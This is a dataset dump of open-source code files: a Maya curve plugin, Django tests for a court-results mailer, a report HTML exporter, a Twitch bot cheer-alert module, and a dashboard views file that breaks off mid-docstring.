repo_name (string) | path (string) | copies (string) | size (string) | content (string) | license (string) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool) |
---|---|---|---|---|---|---|---|---|---|---|
sergeneren/anima | anima/env/mayaEnv/plugins/closestPointOnCurve.py | 1 | 8872 |
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2015, Anima Istanbul
#
# This module is part of anima-tools and is released under the BSD 2
# License: http://www.opensource.org/licenses/BSD-2-Clause
import sys
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
kPluginNodeTypeName = "spClosestPointOnCurve"
cpocPluginId = OpenMaya.MTypeId(0x00349)
# Node definition
class closestPointOnCurve(OpenMayaMPx.MPxNode):
# the plugs
aInCurve = OpenMaya.MObject()
aInPosition = OpenMaya.MObject()
aOutPosition = OpenMaya.MObject()
aOutPositionX = OpenMaya.MObject()
aOutPositionY = OpenMaya.MObject()
aOutPositionZ = OpenMaya.MObject()
aOutNormal = OpenMaya.MObject()
aOutNormalX = OpenMaya.MObject()
aOutNormalY = OpenMaya.MObject()
aOutNormalZ = OpenMaya.MObject()
aOutParam = OpenMaya.MObject()
def __init__(self):
OpenMayaMPx.MPxNode.__init__(self)
def compute(self, plug, dataBlock):
if plug == closestPointOnCurve.aOutPosition or plug == closestPointOnCurve.aOutParam:
dataHandle = dataBlock.inputValue(closestPointOnCurve.aInCurve)
inputAsCurve = dataHandle.asNurbsCurve()
#if not inputAsCurve.hasFn(OpenMaya.MFn.kNurbsCurve):
# return OpenMaya.kUnknownParameter
dataHandle = dataBlock.inputValue(closestPointOnCurve.aInPosition)
inPositionAsFloat3 = dataHandle.asFloat3()
inPosition = OpenMaya.MPoint(
inPositionAsFloat3[0],
inPositionAsFloat3[1],
inPositionAsFloat3[2]
)
# connect the MFnNurbsCurve
# and ask the closest point
nurbsCurveFn = OpenMaya.MFnNurbsCurve(inputAsCurve)
# get and set outPosition
outParam = OpenMaya.MScriptUtil()
outParam.createFromDouble(0)
outParamPtr = outParam.asDoublePtr()
# get position and parameter
outPosition = nurbsCurveFn.closestPoint(
inPosition, True, outParamPtr, 0.001, OpenMaya.MSpace.kWorld
)
outputHandle = dataBlock.outputValue(
closestPointOnCurve.aOutPosition
)
outputHandle.set3Float(outPosition.x, outPosition.y, outPosition.z)
# get and set outNormal
#outNormal = nurbsCurveFn.normal(parameter, OpenMaya.MSpace.kWorld)
#outputHandle = dataBlock.outputValue(closestPointOnCurve.aOutNormal)
#outputHandle.set3Float(outNormal.x, outNormal.y, outNormal.z)
#outputHandle.set3Float(0, 1, 0 )
# get and set the uvs
outputHandle = dataBlock.outputValue(closestPointOnCurve.aOutParam)
#outputHandle.setFloat(OpenMaya.MScriptUtil(outParamPtr).asDouble())
outputHandle.setFloat(OpenMaya.MScriptUtil.getDouble(outParamPtr))
dataBlock.setClean(plug)
else:
return OpenMaya.kUnknownParameter
# creator
def nodeCreator():
return OpenMayaMPx.asMPxPtr(closestPointOnCurve())
# initializer
def nodeInitializer():
tAttr = OpenMaya.MFnTypedAttribute()
nAttr = OpenMaya.MFnNumericAttribute()
# input curve
closestPointOnCurve.aInCurve = tAttr.create(
"inCurve", "ic", OpenMaya.MFnData.kNurbsCurve
)
tAttr.setStorable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInCurve)
# input position
closestPointOnCurve.aInPositionX = nAttr.create(
"inPositionX", "ipx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionX)
closestPointOnCurve.aInPositionY = nAttr.create(
"inPositionY", "ipy", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionY)
closestPointOnCurve.aInPositionZ = nAttr.create(
"inPositionZ", "ipz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionZ)
closestPointOnCurve.aInPosition = nAttr.create(
"inPosition", "ip",
closestPointOnCurve.aInPositionX,
closestPointOnCurve.aInPositionY,
closestPointOnCurve.aInPositionZ
)
nAttr.setStorable(1)
nAttr.setKeyable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPosition)
# output position
closestPointOnCurve.aOutPositionX = nAttr.create(
"outPositionX", "opx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionX)
closestPointOnCurve.aOutPositionY = nAttr.create(
"outPositionY", "opy", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionY)
closestPointOnCurve.aOutPositionZ = nAttr.create(
"outPositionZ", "opz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionZ)
closestPointOnCurve.aOutPosition = nAttr.create(
"outPosition", "op",
closestPointOnCurve.aOutPositionX,
closestPointOnCurve.aOutPositionY,
closestPointOnCurve.aOutPositionZ
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPosition)
# output normal
closestPointOnCurve.aOutNormalX = nAttr.create(
"outNormalX", "onx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalX)
closestPointOnCurve.aOutNormalY = nAttr.create(
"outNormalY", "ony", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalY)
closestPointOnCurve.aOutNormalZ = nAttr.create(
"outNormalZ", "onz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalZ)
closestPointOnCurve.aOutNormal = nAttr.create(
"outNormal", "on",
closestPointOnCurve.aOutNormalX,
closestPointOnCurve.aOutNormalY,
closestPointOnCurve.aOutNormalZ
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormal)
closestPointOnCurve.aOutParam = nAttr.create(
"outParam", "opa", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutParam)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutPosition
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutPosition
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutParam
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutParam
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutNormal
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutNormal
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aOutParam,
closestPointOnCurve.aOutPosition
)
# initialize the script plug-in
def initializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject, "Erkan Ozgur Yilmaz","1.0.2")
try:
mplugin.registerNode(
kPluginNodeTypeName,
cpocPluginId,
nodeCreator,
nodeInitializer
)
except:
sys.stderr.write("Failed to register node: %s" % kPluginNodeTypeName)
raise
# uninitialize the script plug-in
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
try:
mplugin.deregisterNode(cpocPluginId)
except:
sys.stderr.write("Failed to deregister node: %s" % kPluginNodeTypeName)
raise
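# Illustrative usage sketch (not part of the original plugin; assumes the file is on
# Maya's plug-in path): after maya.cmds.loadPlugin('closestPointOnCurve.py'), a node can
# be created with cmds.createNode('spClosestPointOnCurve'), a curve shape's world-space
# output connected to its 'inCurve' plug and a position fed into 'inPosition', so that
# 'outPosition' and 'outParam' update whenever compute() runs.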
| bsd-2-clause | -1,998,576,980,713,366,500 | 32.228464 | 93 | 0.679554 | false |
ministryofjustice/manchester_traffic_offences_pleas | apps/result/tests.py | 1 | 14800 |
# -*- coding: utf-8 -*-
import datetime as dt
import os
from mock import patch
from decimal import Decimal
from io import StringIO
from django.core import mail
from django.test import TestCase
from apps.plea.models import Court, Case, CaseOffenceFilter
from .models import Result, ResultOffenceData, ResultOffence
from .management.commands.process_results import Command
class ResultTestCase(TestCase):
def setUp(self):
self.test_court = Court.objects.create(
court_code="1234",
region_code="51",
court_name="Test Court",
enabled=True
)
self.test_case1 = Case.objects.create(
case_number="12345678",
urn="51XX0000000",
email="[email protected]",
sent=True
)
self.test_result1 = Result.objects.create(
urn="51XX0000000",
case_number="12345678",
case=self.test_case1,
date_of_hearing=dt.date.today(),
sent=False,
processed=False,
account_number="12345",
division="100"
)
self.offence1 = ResultOffence.objects.create(
result=self.test_result1,
offence_code="XXXXXXX",
offence_seq_number="001"
)
self.offence2 = ResultOffence.objects.create(
result=self.test_result1,
offence_code="YYYYYYY",
offence_seq_number="002"
)
self.f_code_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINAL CODE"
)
def test_has_valid_offences_with_non_whitelisted_offences(self):
CaseOffenceFilter.objects.create(filter_match="VVVVV", description="A test whitelist entry")
self.assertFalse(self.test_result1.has_valid_offences())
def test_has_valid_offences_with_all_whitelisted_offences(self):
CaseOffenceFilter.objects.create(filter_match="YYYYY", description="A test whitelist entry")
CaseOffenceFilter.objects.create(filter_match="XXXX", description="A test whitelist entry")
self.assertTrue(self.test_result1.has_valid_offences())
def test_can_result_succeeds(self):
result, _ = self.test_result1.can_result()
self.assertTrue(result)
def test_can_result_with_adjourned_offence_is_false(self):
self.f_code_offence.delete()
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="A",
result_short_title="ADJOURNED!"
)
result, _ = self.test_result1.can_result()
self.assertFalse(result)
def test_can_result_with_adjourned_and_withdrawn_offence_is_true(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="A",
result_short_title="ADJOURNED!"
)
self.withdrawn_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="WDRN",
result_short_title="FINE VICTIM SURCHARGE!"
)
result, _ = self.test_result1.can_result()
self.assertTrue(result)
def test_can_result_with_adjourned_and_final_codes_is_true(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="A",
result_short_title="ADJOURNED!"
)
self.withdrawn_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="WDRN",
result_short_title="WITHDRAWN!"
)
def test_can_result_with_disqualified_code_is_false(self):
self.withdrawn_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="DDDT",
result_short_title="DISQUALIFIED!"
)
result, _ = self.test_result1.can_result()
self.assertFalse(result)
def test_can_result_missing_divcode_or_acc_number(self):
self.test_result1.account_number = ""
self.test_result1.save()
result, _ = self.test_result1.can_result()
self.assertFalse(result)
self.test_result1.account_number = "12345"
self.test_result1.division = ""
self.test_result1.save()
result, _ = self.test_result1.can_result()
self.assertFalse(result)
def test_get_offence_totals_fines(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE"
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(len(fines), 2)
def test_get_offence_totals_fines_wording_english(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"english words £75.00 more english",
result_short_title_welsh="dirwy",
result_wording_welsh=u"I dalu costau o £75.00 welsh"
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(fines[0], u"english words £75.00 more english")
def test_get_offence_totals_fines_wording_welsh(self):
self.test_case1.language = "cy"
self.test_case1.save()
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"english words £75.00 more english",
result_short_title_welsh="dirwy",
result_wording_welsh=u"I dalu costau o £75.00 welsh"
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(fines[0], u"I dalu costau o £75.00 welsh")
def test_get_offence_totals_fines_wording_welsh_but_no_welsh_text(self):
self.test_case1.language = "cy"
self.test_case1.save()
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"english words £75.00 more english",
result_short_title_welsh="dirwy",
result_wording_welsh=u""
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(fines[0], u"english words £75.00 more english")
def test_get_offence_totals_fines_wording_welsh_but_whitespace_welsh_text(self):
self.test_case1.language = "cy"
self.test_case1.save()
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"english words £75.00 more english",
result_short_title_welsh="dirwy",
result_wording_welsh=u" "
)
fines, _, _ = self.test_result1.get_offence_totals()
self.assertEquals(fines[0], u"english words £75.00 more english")
def test_get_offence_totals_endorsements(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="LEP",
result_short_title="ENDORSEMENT",
result_wording="Driving record endorsed with 3 points.",
)
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence2,
result_code="LEA",
result_short_title="ENDORSEMENT",
result_wording="Driving record endorsed with 6 points."
)
_, endorsements, _ = self.test_result1.get_offence_totals()
self.assertEquals(len(endorsements), 2)
self.assertEquals(endorsements[0], "Driving record endorsed with 3 points.")
self.assertEquals(endorsements[1], "Driving record endorsed with 6 points.")
def test_get_offence_totals_total(self):
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINE",
result_wording=u"asdfsadf £75.00 asasdfadfs"
)
self.adjourned_offence = ResultOffenceData.objects.create(
result_offence=self.offence2,
result_code="FVS",
result_short_title="FINE",
result_wording=u"asdfsadf £25.00 asasdfadfs"
)
_, _, total = self.test_result1.get_offence_totals()
self.assertEquals(Decimal("100"), total)
class ProcessResultsTestCase(TestCase):
def setUp(self):
self.test_court = Court.objects.create(
court_code="1234",
region_code="51",
court_name="Test Court",
enabled=True,
)
self.test_case1 = Case.objects.create(
case_number="12345678",
urn="51XX0000000",
sent=True,
email="[email protected]"
)
self.test_result1 = Result.objects.create(
urn="51XX0000000",
case_number="12345678",
date_of_hearing=dt.date.today(),
sent=False,
processed=False,
account_number="12345",
division="100"
)
self.offence1 = ResultOffence.objects.create(
result=self.test_result1
)
self.adjourned_result = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="A",
result_short_title="ADJOURNED"
)
self.withdrawn_result = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="WDRN",
result_short_title="WITHDRAWN"
)
self.final_result = ResultOffenceData.objects.create(
result_offence=self.offence1,
result_code="FCOST",
result_short_title="FINAL"
)
self.command = Command(stdout=StringIO())
self.opts = dict(
override_recipient="",
status_email_recipients="",
dry_run=False,
date="")
def test_matching_case_with_email_is_sent(self):
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertTrue(result.sent)
self.assertTrue(result.processed)
self.assertEquals(len(mail.outbox), 1)
self.assertEquals(mail.outbox[0].to, [self.test_case1.email])
def test_option_override_recipient(self):
self.opts["override_recipient"] = "[email protected]"
self.command.handle(**self.opts)
self.assertEquals(len(mail.outbox), 1)
self.assertEquals(mail.outbox[0].to, ["[email protected]"])
def test_option_dry_run(self):
self.opts["dry_run"] = True
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertFalse(result.processed)
self.assertFalse(result.sent)
def test_option_send_status_email(self):
self.opts["dry_run"] = True
self.opts["status_email_recipients"] = "[email protected]"
self.command.handle(**self.opts)
self.assertEquals(len(mail.outbox), 1)
self.assertEquals(mail.outbox[0].to, ["[email protected]"])
@patch('os.environ.get')
def test_subject_includes_env(self, mock_env):
self.opts["dry_run"] = True
self.opts["status_email_recipients"] = "[email protected]"
mock_env.return_value = 'unit_test'
self.command.handle(**self.opts)
self.assertEquals(mail.outbox[0].subject, "[unit_test] make-a-plea resulting status email")
def test_no_supplied_email_no_result(self):
self.test_case1.email = None
self.test_case1.save()
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertTrue(result.processed)
self.assertFalse(result.sent)
def test_no_matching_case_no_email(self):
self.test_case1.delete()
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertTrue(result.processed)
self.assertFalse(result.sent)
def test_case_not_sent_result_not_sent(self):
"""
If the case does not have sent=True, do not send the result email
"""
self.test_case1.sent = False
self.test_case1.save()
self.command.handle(**self.opts)
result = Result.objects.get(id=self.test_result1.id)
self.assertFalse(result.sent)
self.assertTrue(result.processed)
def test_result_sent_not_resent(self):
self.test_result1.sent = True
self.test_result1.save()
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertEquals(mail.outbox, [])
def test_result_is_marked_sent_and_processed(self):
assert not self.test_result1.sent
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertTrue(result.sent)
self.assertTrue(result.processed)
def test_date_option(self):
assert self.test_result1.created.date() == dt.date.today()
self.opts["date"] = (dt.date.today()-dt.timedelta(7)).strftime("%d/%m/%Y")
self.command.handle(**self.opts)
result = Result.objects.get(pk=self.test_result1.id)
self.assertFalse(result.sent)
self.assertFalse(result.processed)
def test_forward_email_section_removed_from_plain_text_email(self):
self.command.handle(**self.opts)
search_text = "If you're unsure an email is from the Ministry of Justice"
self.assertNotIn(search_text, mail.outbox[0].body)
def test_forward_email_section_removed_from_html_email(self):
self.command.handle(**self.opts)
search_text = "If you're unsure an email is from the Ministry of Justice"
self.assertNotIn(search_text, mail.outbox[0].alternatives[0][0])
def test_result_for_welsh_case_sent_in_welsh(self):
self.test_case1.language = "cy"
self.test_case1.save()
self.command.handle(**self.opts)
assert mail.outbox[0].subject == 'Canlyniad Cofnodi Ple'
assert 'Eich llys: Test Court' in mail.outbox[0].body
| mit | -1,403,374,018,041,353,200 | 29.744283 | 100 | 0.613741 | false |
appknox/vendor | ak_vendor/report_sample.py | 1 | 1164 |
import json
from os.path import dirname, abspath
from django import template
from django.conf import settings
from django.template import Template, Context
from django.template.engine import Engine
from django.core.wsgi import get_wsgi_application
from ak_vendor.report import Report
settings.configure()
application = get_wsgi_application()
CUR_DIR = dirname(abspath(__file__))
template.Library()
class ReportHTMLExporter:
def __init__(self, report):
self.report = report
def to_html(self):
tpl = open('{}/report/report_template.html'.format(CUR_DIR)).read()
template = Template(tpl, engine=Engine(libraries={
'i18n': 'django.templatetags.i18n'
}))
context = Context({
'report': self.report
})
content = template.render(context)
return content
def to_html_file(self, path=''):
with open('{}/output.html'.format(path), 'w') as file:
tpl = self.to_html()
file.write(tpl)
data = json.load(open('{}/report_sample1.json'.format(CUR_DIR)))
report_obj = Report.from_json(data)
ReportHTMLExporter(report_obj).to_html_file(CUR_DIR)
| mit | 2,017,626,688,635,430,700 | 28.1 | 75 | 0.664089 | false |
pajlada/pajbot | pajbot/modules/chat_alerts/cheeralert.py | 1 | 12111 |
import logging
import math
from pajbot.managers.handler import HandlerManager
from pajbot.modules import BaseModule
from pajbot.modules import ModuleSetting
from pajbot.modules.chat_alerts import ChatAlertModule
log = logging.getLogger(__name__)
class CheerAlertModule(BaseModule):
ID = __name__.split(".")[-1]
NAME = "Cheer Alert"
DESCRIPTION = "Prints a message in chat/whispers when a user cheers in your chat"
CATEGORY = "Feature"
ENABLED_DEFAULT = False
PARENT_MODULE = ChatAlertModule
SETTINGS = [
ModuleSetting(
key="chat_message",
label="Enable chat messages for users who cheer bits",
type="boolean",
required=True,
default=True,
),
ModuleSetting(
key="whisper_message",
label="Enable whisper messages for users who cheer bits",
type="boolean",
required=True,
default=False,
),
ModuleSetting(
key="whisper_after",
label="Whisper the message after X seconds",
type="number",
required=True,
placeholder="",
default=5,
constraints={"min_value": 1, "max_value": 120},
),
ModuleSetting(
key="one_bit",
label="Chat message for users who cheer 1 or more bits | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="{username} thank you so much for cheering {num_bits} bits! PogChamp",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="sixnine_bits",
label="Chat message for users who cheer 69 bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! Kreygasm",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="hundred_bits",
label="Chat message for users who cheer 100 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fourtwenty_bits",
label="Chat message for users who cheer 420 bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! CiGrip",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fivehundred_bits",
label="Chat message for users who cheer 500 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fifteenhundred_bits",
label="Chat message for users who cheer 1500 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fivethousand_bits",
label="Chat message for users who cheer 5000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="tenthousand_bits",
label="Chat message for users who cheer 10000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="twentyfivethousand_bits",
label="Chat message for users who cheer 25000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="grant_points_per_100_bits",
label="Give points to user per 100 bits they cheer. 0 = off",
type="number",
required=True,
placeholder="",
default=0,
constraints={"min_value": 0, "max_value": 50000},
),
ModuleSetting(
key="alert_message_points_given",
label="Message to announce points were given to user, leave empty to disable message. If the user cheers less than 100 bits, no message will be sent. | Available arguments: {username}, {points}, {num_bits}",
type="text",
required=True,
default="{username} was given {points} points for cheering {num_bits} bits! FeelsAmazingMan",
constraints={"max_str_len": 300},
),
]
def __init__(self, bot):
super().__init__(bot)
def on_cheer(self, user, num_bits):
"""
A user just cheered bits.
Send the event to the websocket manager, and send a customized message in chat.
"""
payload = {"username": user.name, "num_bits": num_bits}
self.bot.websocket_manager.emit("cheer", payload)
if self.settings["chat_message"]:
if num_bits >= 25000 and self.settings["twentyfivethousand_bits"] != "":
self.bot.say(self.get_phrase("twentyfivethousand_bits", **payload))
elif num_bits >= 10000 and self.settings["tenthousand_bits"] != "":
self.bot.say(self.get_phrase("tenthousand_bits", **payload))
elif num_bits >= 5000 and self.settings["fivethousand_bits"] != "":
self.bot.say(self.get_phrase("fivethousand_bits", **payload))
elif num_bits >= 1500 and self.settings["fifteenhundred_bits"] != "":
self.bot.say(self.get_phrase("fifteenhundred_bits", **payload))
elif num_bits >= 500 and self.settings["fivehundred_bits"] != "":
self.bot.say(self.get_phrase("fivehundred_bits", **payload))
elif num_bits == 420 and self.settings["fourtwenty_bits"] != "":
self.bot.say(self.get_phrase("fourtwenty_bits", **payload))
elif num_bits >= 100 and self.settings["hundred_bits"] != "":
self.bot.say(self.get_phrase("hundred_bits", **payload))
elif num_bits == 69 and self.settings["sixnine_bits"] != "":
self.bot.say(self.get_phrase("sixnine_bits", **payload))
elif self.settings["one_bit"] != "":
self.bot.say(self.get_phrase("one_bit", **payload))
if self.settings["whisper_message"]:
if num_bits >= 25000 and self.settings["twentyfivethousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("twentyfivethousand_bits", **payload),
)
elif num_bits >= 10000 and self.settings["tenthousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("tenthousand_bits", **payload),
)
elif num_bits >= 5000 and self.settings["fivethousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fivethousand_bits", **payload),
)
elif num_bits >= 1500 and self.settings["fifteenhundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fifteenhundred_bits", **payload),
)
elif num_bits >= 500 and self.settings["fivehundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fivehundred_bits", **payload),
)
elif num_bits == 420 and self.settings["fourtwenty_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fourtwenty_bits", **payload),
)
elif num_bits >= 100 and self.settings["hundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("hundred_bits", **payload),
)
elif num_bits == 69 and self.settings["sixnine_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("sixnine_bits", **payload),
)
elif self.settings["one_bit"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("one_bit", **payload),
)
if self.settings["grant_points_per_100_bits"] <= 0:
return
round_number = math.floor(num_bits / 100)
if round_number > 0:
points_to_grant = round_number * self.settings["grant_points_per_100_bits"]
user.points += points_to_grant
alert_message = self.settings["alert_message_points_given"]
if alert_message != "":
self.bot.say(alert_message.format(username=user, points=points_to_grant, num_bits=num_bits))
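# Worked example of the arithmetic above (illustrative values): with the setting
# grant_points_per_100_bits = 5, a cheer of 250 bits gives math.floor(250 / 100) = 2
# rounded hundreds, so 2 * 5 = 10 points are granted and the alert message is sent.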
def on_pubmsg(self, source, tags, **rest):
if "bits" not in tags:
return
try:
num_bits = int(tags["bits"])
except ValueError:
log.error("BabyRage error occurred with getting the bits integer")
return
if "display-name" not in tags:
log.debug(f"cheeralert requires a display-name, but it is missing: {tags}")
return
self.on_cheer(source, num_bits)
def enable(self, bot):
HandlerManager.add_handler("on_pubmsg", self.on_pubmsg)
def disable(self, bot):
HandlerManager.remove_handler("on_pubmsg", self.on_pubmsg)
| mit | -5,770,239,708,818,410,000 | 43.690037 | 219 | 0.546033 | false |
artemharutyunyan/copilot | src/copilot-dashboard/copilot_dashboard/dashboard/views.py | 1 | 3545 |
import httplib2
import datetime
from urllib import urlencode
from random import random
from django.http import HttpRequest, HttpResponse
from django.core.serializers.json import DjangoJSONEncoder
from django.utils import simplejson
from django.conf import settings
import bson.json_util
from bson.objectid import ObjectId
import models as DB
from copilot_dashboard.settings import SETTINGS
HTTP = httplib2.Http("/tmp/httplib2-cache")
### Handlers ###
def ping(request):
"""
GET /api/ping
Responds with {"ping":"pong"} (HTTP 200) in case the system is working fine
Status codes:
* 200 - OK
"""
return json({'ping': 'pong'})
def stats(request):
"""
GET /api/stats?target={graphite path}[&from={start timestamp}&until={end timestamp}]
A simple Graphite proxy
Status codes:
* 200 - OK
* 400 - Missing query parameter
* 500 - No such data is available
"""
try:
path = request.GET['target']
except KeyError, e:
return json({'error': True}, 400)
start = request.GET.get('from', None)
end = request.GET.get('until', None)
data = mk_graphite_request(path, start, end)
return HttpResponse(data, mimetype="application/json")
def connections(request):
"""
GET /api/connections?from={start}[&allactive=true]
Lists all connected users in specified timeframe.
If 'allactive' is set to 'true', the timeframe will be ignored and instead
all currently connected users will be listed.
Response (JSON):
[
{"_id": "Document ID", "loc": [Longitude, Latitude]},
...
]
Status codes:
* 200 - OK
* 400 - Missing query parameter (from)
"""
collection = DB.get_collection('connections')
docs = []
query = None
if request.GET.get('allactive', 'false') == 'true':
query = {'connected': True, 'agent_data.component': 'agent'}
else:
try:
start = datetime.datetime.fromtimestamp(int(request.GET['from'])/1000)
except KeyError, e:
return json({'error': True}, 400)
query = {'updated_at': {'$gte': start}, 'agent_data.component': 'agent'}
for doc in collection.find(query, {'_id': 1, 'loc': 1}):
doc['loc'] = [coord + random()*0.0004 for coord in doc['loc']]
docs.append(doc)
return json(docs)
def connection_info(request, id):
"""
GET /api/connection/{connection id}
Responds with all data available for the specified connection (except for document's ID and coordinates).
Status codes:
* 200 - OK
